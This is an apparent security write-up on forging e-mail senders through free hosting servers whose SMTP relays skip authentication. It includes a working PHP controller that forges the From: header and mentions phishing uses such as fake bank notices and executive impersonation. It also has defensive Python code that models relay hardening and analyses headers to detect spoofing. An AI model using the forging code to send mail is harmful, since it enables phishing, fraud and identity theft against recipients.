Using free hosting to spoof and forge e-mails for spamming

E-mail spoofing, as the name suggests, is a technique attackers use to falsify the sender of an e-mail message. It works because SMTP itself never verifies the From: field: a forged message is only caught when the spoofed domain publishes SPF, DKIM and DMARC records in its DNS zone and the receiving server enforces them, or when the relay that accepts the message requires authentication and ties the sender address to the authenticated account. A missing DNS record on one side, or a relay without authentication on the other, is what makes spoofing possible.

There are many ways to put e-mail spoofing to use. An attacker can send fake billing notices that appear to come from the victim's bank, send messages that appear to come from relatives, or exploit business relationships by forging messages from directors, supervisors and ordinary employees, either to profit from it or simply to harm people.

The target of this article is free hosting providers and their servers. Because they are open to the public and give every account easy access to sendmail, an SMTP relay and even zone transfers, they leave room for attackers who host applications there to exploit the lack of SMTP authentication on the server, set the From: of the message to whatever they like, and ride on the provider's own outbound servers, whose reputation and signatures are trusted, to get past spam filters and fraud controls. (What still stops such a message is a recipient that enforces SPF, DKIM and DMARC for the spoofed domain; the technique works where that is not done.)

But how does this work in practice?

1. The attacker uses space allocated on a shared free-hosting server to host a malicious web application that uses PHP's mail() function, Python's smtplib or any other library or function that builds and sends e-mail over SMTP. The application receives POST parameters and, through a controller, assembles them into an e-mail message. I wrote this PoC in PHP because most of the free hosting servers I tested only support PHP, MySQL and the like, and I felt more comfortable building the objects with CodeIgniter. Let us look at the function below:

    <?php
    defined('BASEPATH') or exit('No direct script access allowed');

    class Envia extends CI_Controller {

        public function __construct() {
            parent::__construct();
        }

        // Receives the POSTed fields, packs them into an array and hands
        // the array to send_spoofing(), which does the actual delivery.
        public function enviar() {
            if ($_POST) {
                $fromname  = $this->input->post('fromname');
                $fromemail = $this->input->post('fromemail');
                $toemail   = $this->input->post('toemail');
                $subject   = $this->input->post('subject');
                $message   = $this->input->post('message');
                $data = array('fromname' => $fromname, 'fromemail' => $fromemail, 'toemail' => $toemail, 'subject' => $subject, 'message' => $message);
                if ($this->send_spoofing($data) == TRUE) {
                    return TRUE;
                } else {
                    return FALSE;
                }
            }
        }
    }

We built a class to send the e-mails. This is the normal process for assembling an e-mail message on any occasion: we take the fields POSTed to the controller and put them in an array. This part is really very basic; the function only collects the data into the array and calls another function, 'send_spoofing()', passing that data as its argument. That function is responsible for the delivery itself.

    <?php
    // Method of the Envia controller above: builds the headers and hands
    // the message to the local MTA through PHP's mail().
    public function send_spoofing($data) {
        $fromemail = $data['fromemail'];
        $fromname  = $data['fromname'];
        $to        = $data['toemail'];
        $subject   = $data['subject'];
        $message   = $data['message'];

        $utf  = "Content-Type: text/plain;charset=UTF-8\n";
        $lt   = "<";
        $gt   = ">";
        $sp   = " ";
        $from = "From:";
        $headers = $utf . $from . $fromname . $sp . $lt . $fromemail . $gt;

        if (mail($to, $subject, $message, $headers)) {
            return TRUE;
        } else {
            return FALSE;
        }
    }

As we can see, we have created a function that builds the e-mail from the data received in the array. We also set the charset to UTF-8, simply to keep everything tidy and avoid mangled special characters when the victim's mail client decodes the message with a different encoding, with '$utf = "Content-Type: text/plain;charset=UTF-8\n";'. Then we build the header of the e-mail with the data we received:

 $headers = $utf . $from . $fromname . $sp . $lt . $fromemail . $gt;

It is extremely important to pay attention to this detail: if anything departs from the header format (one 'Name: value' field per line, with a single blank line separating the headers from the body, as in the MIME example below, which carries MIME-Version: 1.0), the e-mail will either not be sent or will go out with its attributes misplaced, with the Subject ending up in the body or vice versa. For those who have never seen one, this is what a message assembled with a MIMEText-style library (Python's email.mime, for instance) looks like once built; the base64 body decodes to "Corpo da mensagem" ("Message body"):

    Content-Type: multipart/mixed; boundary="===============5711234466013666245=="
    MIME-Version: 1.0
    From:
    To:
    Subject: Assunto da Mensagem

    --===============5711234466013666245==
    Content-Type: text/plain; charset="utf-8"
    MIME-Version: 1.0
    Content-Transfer-Encoding: base64

    Q29ycG8gZGEgbWVuc2FnZW0=
    --===============5711234466013666245==--
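As an added example (not code from the original article), here is the same kind of message built in Python, whose email library produced the MIMEText dump above: once with the standard library, which writes the header/body separator exactly once, and once by hand-concatenating headers as the PHP PoC does, with a `sep` parameter that reproduces the failure mode just described (a stray blank line ends the header section early and pushes the remaining headers, Subject included, into the body). Names, addresses and the subject are constructed placeholders, and the function names are mine.

```python
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from email.utils import formataddr

# Constructed sample input; the addresses are placeholders, not real accounts.
FROMNAME = "Ana Silva"
FROMEMAIL = "ana@example.com"
TO = "victim@example.net"
SUBJECT = "Invoice 4471"
BODY = "Hello, please find the invoice attached."


def build_message(fromname, fromemail, to, subject, body):
    """Build the message with the standard library: formataddr() quotes the
    display name when needed, EmailMessage folds and encodes the headers,
    and the blank line separating headers from body is written exactly once."""
    msg = EmailMessage(policy=policy.SMTP)
    msg["From"] = formataddr((fromname, fromemail))
    msg["To"] = to
    msg["Subject"] = subject
    msg.set_content(body, charset="utf-8")
    return msg.as_bytes()


def build_by_hand(fromname, fromemail, to, subject, body, sep="\r\n"):
    """Hand-concatenate the headers the way the PHP PoC does. `sep` goes
    between header lines: CRLF is correct; "\r\n\r\n" inserts a blank line
    after the first header and reproduces the failure mode."""
    headers = (
        "Content-Type: text/plain; charset=UTF-8" + sep
        + "From: " + fromname + " <" + fromemail + ">" + sep
        + "To: " + to + sep
        + "Subject: " + subject + sep
    )
    # RFC 5322: the first empty line ends the header section; everything
    # after it is body, whatever it looks like.
    return (headers + "\r\n" + body).encode("utf-8")


def inspect_message(raw):
    """Parse a raw message the way a receiving MTA or mail client would and
    report where the fields actually ended up."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    part = msg.get_body(preferencelist=("plain",))
    text = part.get_content() if part is not None else ""
    return {
        "from": str(msg["From"]) if msg["From"] is not None else None,
        "subject": str(msg["Subject"]) if msg["Subject"] is not None else None,
        "body": text,
    }


if __name__ == "__main__":
    variants = (
        ("library", build_message(FROMNAME, FROMEMAIL, TO, SUBJECT, BODY)),
        ("by hand, correct", build_by_hand(FROMNAME, FROMEMAIL, TO, SUBJECT, BODY)),
        ("by hand, stray blank line",
         build_by_hand(FROMNAME, FROMEMAIL, TO, SUBJECT, BODY, sep="\r\n\r\n")),
    )
    for label, raw in variants:
        print(label, "->", inspect_message(raw))
```

In the third variant the parsed message has no From: and no Subject: at all; both lines show up verbatim at the top of the body, which is exactly the "Subject in the body" symptom the article warns about.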

2. So far we have seen two quite ordinary functions that do nothing out of the ordinary. You could use this example to send mail normally through your own provider; there is nothing specific about it. That is exactly the problem. As the diagram above shows, the exploitation consists of abusing the trust relationship between the hosting server and the SMTP relay (or the plain absence of authentication between them, depending on the setup): without needing any credentials, the application hands the message it built to that same relay with a brazenly fake From:, and the relay accepts any domain we put there, @microsoft, @apple, @gov, @anything. What then goes out is a message vouched for by the provider's own server, carrying that server's identity and whatever signature it applies, not the identity of the domain in the From: we forged. That is where the spoofing works.

3. After being built, the e-mail is sent through, and signed by, the trusted SMTP server inside the hosting cluster and forwarded from there to the victim. As an example, I created a malicious application on a free hosting server whose identity I will not reveal until the company in question replies to my e-mails authorizing it; in any case, what follows is the exchange between mailboxes created only for this example, without prejudice to third parties, without involving any other corporation, and without harming any individual or legal entity.
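As an added example, not from the original article, the exchange of steps 2 and 3 modelled in Python: a web node inside the hosting cluster submits a message with a forged From: to the provider's relay, once against the weak policy described above (cluster nodes may relay without authenticating and with any sender address) and once against a hardened policy (authentication required, and both the envelope sender and the From: header must belong to a domain the account hosts). Hostnames, addresses, the internal network range and the reply texts are all constructed for this example, modelled on typical MTA replies; `RelayPolicy`, `Session` and `submit()` are my names.

```python
from dataclasses import dataclass, field
from email.utils import parseaddr

# Constructed values: the provider's hosted domain, its internal web-node
# range and the hostnames below are placeholders for the example.
HOSTED_DOMAINS = {"freehost.example"}
CLUSTER_NET = "10.20.0."


def domain_of(address):
    """Domain part of an address, accepting 'Name <user@host>' as well."""
    return parseaddr(address)[1].rsplit("@", 1)[-1].lower()


@dataclass
class RelayPolicy:
    require_auth: bool             # demand AUTH even from cluster nodes
    bind_sender_to_account: bool   # MAIL FROM and From: must be hosted domains


WEAK = RelayPolicy(require_auth=False, bind_sender_to_account=False)
HARDENED = RelayPolicy(require_auth=True, bind_sender_to_account=True)


@dataclass
class Session:
    """One SMTP submission, recording both sides of the dialogue."""
    client_ip: str
    policy: RelayPolicy
    authenticated: bool = False
    transcript: list = field(default_factory=list)

    def _c(self, line):
        self.transcript.append("C: " + line)

    def _s(self, line):
        self.transcript.append("S: " + line)

    def run(self, envelope_from, header_from, rcpt, authenticate):
        p = self.policy
        self._s("220 relay.freehost.example ESMTP")
        self._c("EHLO webnode07.freehost.example")
        self._s("250-relay.freehost.example")
        self._s("250 AUTH PLAIN LOGIN")
        if authenticate:
            self._c("AUTH PLAIN <base64 credentials>")
            self._s("235 2.7.0 Authentication successful")
            self.authenticated = True
        self._c(f"MAIL FROM:<{envelope_from}>")
        if p.require_auth and not self.authenticated:
            self._s("530 5.7.0 Authentication required")
            return False
        if not (self.authenticated or self.client_ip.startswith(CLUSTER_NET)):
            # Neither policy is an open relay to the internet; the weakness
            # is that cluster nodes are trusted unconditionally.
            self._s("554 5.7.1 Relay access denied")
            return False
        if p.bind_sender_to_account and domain_of(envelope_from) not in HOSTED_DOMAINS:
            self._s(f"553 5.7.1 <{envelope_from}>: Sender address rejected: not owned by user")
            return False
        self._s("250 2.1.0 Ok")
        self._c(f"RCPT TO:<{rcpt}>")
        self._s("250 2.1.5 Ok")
        self._c("DATA")
        self._s("354 End data with <CR><LF>.<CR><LF>")
        for line in (f"From: {header_from}", f"To: {rcpt}", "Subject: ...", "", "<body>", "."):
            self._c(line)
        # Checking the From: header, not just MAIL FROM, is what stops the PoC:
        # mail() leaves the envelope sender to the MTA while From: is forged.
        if p.bind_sender_to_account and domain_of(header_from) not in HOSTED_DOMAINS:
            self._s("550 5.7.1 From: header domain not permitted for this account")
            return False
        self._s("250 2.0.0 Ok: queued as 3B2F1A0")
        return True


def submit(policy, client_ip="10.20.0.7", authenticate=False,
           envelope_from="alerts@bigbank.example",
           header_from="Security Alert <alerts@bigbank.example>",
           rcpt="victim@example.net"):
    """Run one submission; returns (accepted, transcript)."""
    session = Session(client_ip, policy)
    accepted = session.run(envelope_from, header_from, rcpt, authenticate)
    return accepted, session.transcript


if __name__ == "__main__":
    for name, pol in (("weak", WEAK), ("hardened", HARDENED)):
        accepted, lines = submit(pol)
        print(f"--- {name} relay, forged sender, no AUTH: accepted={accepted}")
        print("\n".join(lines))
```

The weak relay queues the forged message from any cluster node with no credentials at all. The hardened one rejects it three times over: no AUTH, then an envelope sender outside the hosted domains, and, even with a legitimate envelope, a From: header in a domain the account does not own; only a message whose envelope and From: both stay inside the hosted domain gets through.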

Opening the message headers to analyze them more closely, we can identify the exact origin of the e-mail, including the signature, IP address, hostname and the server that relayed it, and we could even use that information to block the message or report it as spam. However, since ordinary users do not open message headers, we can conclude that once this technique is applied it can be used for social engineering attacks, identity theft and so on. Remember that we are not responsible for the improper use of the material presented here; all of this content was written as educational material for information security professionals and students. In total, three companies were found with this 'facility' open, two of them free hosts and one paid. One company has been notified and will not have its identity exposed for the time being; the others will be contacted in the coming days.
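As an added example (not from the original article), a small Python header analysis that does what the paragraph above describes: walk the Received: chain from the bottom up to find where the message was first injected, pick out the host and IP that delivered it to the victim's MX, and read the receiver's Authentication-Results. The sample message is constructed for this example (placeholder hosts, addresses and IPs, laid out the way a Postfix chain looks for a message injected by PHP's mail() on a web node and relayed by the provider's outbound server); `received_chain()` and `analyse()` are my names.

```python
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed sample. The bottom Received: line ("from userid 33") is what
# Postfix writes for a local sendmail submission (33 is www-data on Debian);
# X-PHP-Originating-Script is what PHP adds when mail.add_x_header is on.
SAMPLE = b"""\
Received: from relay.freehost.example (relay.freehost.example [198.51.100.25])
\tby mx.example.net (Postfix) with ESMTPS id 7F3C1A9
\tfor <victim@example.net>; Mon, 6 Mar 2017 14:02:11 +0000
Received: from webnode07.freehost.example (webnode07.freehost.example [10.20.0.7])
\tby relay.freehost.example (Postfix) with ESMTP id 3B2F1A0
\tfor <victim@example.net>; Mon, 6 Mar 2017 14:02:10 +0000
Received: by webnode07.freehost.example (Postfix, from userid 33)
\tid 1C9D2E4; Mon, 6 Mar 2017 14:02:10 +0000
Authentication-Results: mx.example.net;
\tspf=fail smtp.mailfrom=bigbank.example;
\tdkim=none;
\tdmarc=fail (p=none) header.from=bigbank.example
X-PHP-Originating-Script: 33:Envia.php
Content-Type: text/plain; charset=UTF-8
From: Security Alert <alerts@bigbank.example>
To: victim@example.net
Subject: Your account has been suspended
Message-Id: <20170306140210.1C9D2E4@webnode07.freehost.example>

Please confirm your credentials at the link below.
"""

# "from <helo> (<rdns> [<ip>]) by <host> ..." as written by a receiving MTA
HOP_RE = re.compile(r"^from\s+(?P<helo>\S+)\s+\((?:\S+\s+)?\[(?P<ip>[^\]]+)\]\)\s+by\s+(?P<by>\S+)")
# "by <host> (<mta>, from userid <uid>)" as written for a local submission
LOCAL_RE = re.compile(r"^by\s+(?P<by>\S+)\s+\([^,)]+,\s+from userid\s+(?P<uid>\d+)\)")


def received_chain(msg):
    """Hops in message order: index 0 is the last hop, index -1 the origin."""
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(str(value).split())   # unfold the header
        if (m := HOP_RE.match(text)):
            hops.append({"from": m["helo"].lower(), "ip": m["ip"], "by": m["by"].lower(), "uid": None})
        elif (m := LOCAL_RE.match(text)):
            hops.append({"from": None, "ip": None, "by": m["by"].lower(), "uid": int(m["uid"])})
    return hops


def authentication_results(msg):
    """spf/dkim/dmarc verdicts from the receiver's Authentication-Results."""
    text = " ".join(str(msg.get("Authentication-Results", "")).split())
    return dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", text))


def analyse(raw):
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    hops = received_chain(msg)
    from_domain = parseaddr(str(msg["From"]))[1].rsplit("@", 1)[-1].lower()
    entry, origin = (hops[0], hops[-1]) if hops else (None, None)
    path_hosts = [h["by"] for h in hops] + [h["from"] for h in hops if h["from"]]
    auth = authentication_results(msg)
    msgid = re.search(r"@([^>\s]+)>", str(msg.get("Message-Id", "")))
    php = msg.get("X-PHP-Originating-Script")
    return {
        "from_domain": from_domain,
        "entry_host": entry["from"] if entry else None,   # what connected to the victim's MX
        "entry_ip": entry["ip"] if entry else None,
        "origin_host": origin["by"] if origin else None,  # where the mail was first injected
        "origin_uid": origin["uid"] if origin else None,
        "message_id_host": msgid.group(1).lower() if msgid else None,
        "php_script": str(php) if php else None,
        "auth": auth,
        # The From: domain never appears in the delivery path, or the
        # receiver's own SPF/DMARC checks failed: treat as spoofed.
        "spoof_suspected": not any(h.endswith(from_domain) for h in path_hosts)
                           or auth.get("spf") == "fail" or auth.get("dmarc") == "fail",
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(f"{key:>17}: {value}")
```

Everything the article says is visible in the headers falls out of this: the message claims to be from bigbank.example, but it entered the victim's MX from relay.freehost.example, it was injected on webnode07 by the web server's own user, the Message-Id names that web node, and the receiver's SPF and DMARC checks both failed. A mail filter can act on any of these; a user reading only the From: line sees none of them.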